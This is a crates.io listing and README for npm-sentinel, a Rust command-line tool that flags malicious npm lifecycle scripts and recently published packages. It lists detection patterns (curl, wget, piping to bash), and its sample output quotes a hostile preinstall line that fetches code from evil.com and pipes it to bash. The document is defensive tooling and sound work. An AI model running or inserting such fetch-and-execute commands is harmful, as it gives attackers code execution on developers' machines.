npm_sentinel

version: 0.2.0
created_at: 2025-11-26 15:04:32.485443+00
updated_at: 2025-11-26 16:03:02.108668+00
description: A CLI tool to detect supply chain attacks in npm packages by analyzing lifecycle scripts and registry metadata.
repository: https://github.com/emorilebo/npm_sentinel
id: 1951505
size: 54,427 bytes
owner: GODFREY LEBO (emorilebo)

README

npm-sentinel

npm-sentinel is a command-line security tool that helps protect your development environment from supply chain attacks. It analyzes the lifecycle scripts declared in package.json and cross-references each package with the npm registry, acting as an early warning system against malicious dependencies.

"In a world of compromised packages, be the sentinel."

Why npm-sentinel?

Supply chain attacks like Shai Hulud 2.0 are on the rise. They rely on malicious preinstall and postinstall scripts, which npm runs automatically during install, to steal credentials and compromise CI/CD pipelines. npm-sentinel helps you:

  • Detect Malicious Scripts: flag suspicious commands (curl, wget, | bash, encoded payloads) in lifecycle scripts before you install.
  • Identify Newly Created Packages: warns when a dependency was only recently published to the registry, a common trait of typosquatted packages that mimic popular libraries.
  • Audit Dependencies: fast scanning of your local projects; the script analysis works offline, while the registry check needs network access.

Installation

From Crates.io

cargo install npm_sentinel

From Source

git clone https://github.com/emorilebo/npm_sentinel.git
cd npm_sentinel
cargo build --release

Usage

npm-sentinel is designed for simplicity and speed.

Basic Scan

Analyze the current directory for threats:

npm-sentinel

Targeted Scan

Analyze a specific project or file:

npm-sentinel --path /path/to/project
npm-sentinel --path /path/to/package.json

Verbose Mode

Get detailed output about every lifecycle script found:

npm-sentinel --verbose

Example Output

npm-sentinel: Starting analysis...
Target: ./suspicious-package/package.json
Analyzing package: suspicious-lib
  [INFO] Lifecycle script found: 'preinstall'
  [WARNING] Suspicious pattern 'curl' found in script 'preinstall': curl http://evil.com | bash
Checking registry for 'suspicious-lib'...
  Package created: 2025-11-25T10:00:00.000Z (New package!)

Contributing

We welcome contributions! Please see our CONTRIBUTING.md (coming soon) or simply fork and submit a PR.

License

This project is licensed under the MIT License - see the LICENSE file for details.

Author

Godfrey Lebo - https://github.com/emorilebo
